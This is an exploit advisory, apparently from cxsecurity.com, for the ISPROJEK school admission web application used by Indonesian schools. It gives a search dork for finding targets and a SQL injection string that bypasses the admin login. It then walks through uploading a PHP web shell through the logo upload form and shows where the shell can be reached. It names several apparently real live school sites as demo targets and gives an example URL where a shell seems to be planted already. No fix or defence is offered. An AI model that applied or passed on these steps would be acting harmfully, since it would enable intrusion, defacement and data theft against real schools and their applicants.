ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability

2019.03.14
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability [+]Author: Negat1ve [+]Team: -1 [+]Goolge Dork: intext:"ISPROJEK" [+]Tested on: Windows 10 x64 ======================================= [+]Proof Of Concept: Find website with the dork Login url will be site.sch.id/path/login.php Login with this detail user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ You can upload your file via 1. Click Setting or you can paste the link /index.php?p=f_editadmin 2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1 3. Fill all the form, then upload your Shell (php extension) in the "File Logo" Your files will go to site.sch.id/path/images/logo/yourshell.php example: https://aplikasi-cbt.com/ppdb/images/logo/captcha.php NB: - filetype of this uploader is php - Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data Demo sites: https://aplikasi-cbt.com/ppdb/login.php https://ma-arrosyidiyah.sch.id/ppdb/login.php https://mtsyppsbandung.com/ppdb/login.php https://masirnamiskin.com/ppdb/login.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top